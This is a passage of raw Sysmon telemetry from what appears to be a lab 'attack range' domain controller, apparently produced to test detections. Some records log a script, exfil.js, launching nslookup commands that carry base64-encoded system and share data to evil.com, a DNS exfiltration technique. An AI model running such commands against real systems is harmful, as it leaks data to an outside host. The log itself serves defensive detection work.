14:16:03.403{2E1864BB-17A3-629A-793D-000000005F02}17366824C:\Windows\system32\cmd.exe{2E1864BB-17A3-629A-7B3D-000000005F02}7644C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.409{2E1864BB-17A3-629A-7B3D-000000005F02}7644C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A3-629A-793D-000000005F02}1736C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkkjre.tmp 2>&1 10341000x8000000000000000193788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.363{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-7A3D-000000005F02}2088C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.363{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A3-629A-7A3D-000000005F02}2088C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.363{2E1864BB-17A3-629A-7A3D-000000005F02}20883288C:\Windows\system32\conhost.exe{2E1864BB-17A3-629A-793D-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.348{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-7A3D-000000005F02}2088C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.331{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.331{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.331{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.331{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.331{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A3-629A-793D-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.331{2E1864BB-17A1-629A-783D-000000005F02}55525064C:\Windows\System32\WScript.exe{2E1864BB-17A3-629A-793D-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.344{2E1864BB-17A3-629A-793D-000000005F02}1736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkkjre.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000193777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.331{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.331{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000193775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.264{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\surveyor-20220603102414-226MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.100{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBBA03B52169606C9C9F7C36D50CF6A1,SHA256=880D7BF75E7B8C2F169D0FB3EC2D95BD24B4EE45D10C00F2D7E5F756BAB08EB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043905Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:04.245{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=047802B130F3D60BD185E8F58AED213E,SHA256=958F02C5BF307605184C5655180ACEA289A850BEC9F017F937FF94AB64E67F2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.976{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-A13D-000000005F02}6660C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.976{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-A13D-000000005F02}6660C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.960{2E1864BB-17A4-629A-A13D-000000005F02}66602236C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-A03D-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.960{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-A13D-000000005F02}6660C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.944{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.944{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.944{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.944{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.944{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-A03D-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.944{2E1864BB-17A1-629A-783D-000000005F02}55528160C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-A03D-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.949{2E1864BB-17A4-629A-A03D-000000005F02}4784C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvghi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.944{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxcujr.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.897{2E1864BB-17A4-629A-9E3D-000000005F02}47127736C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-9F3D-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.897{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 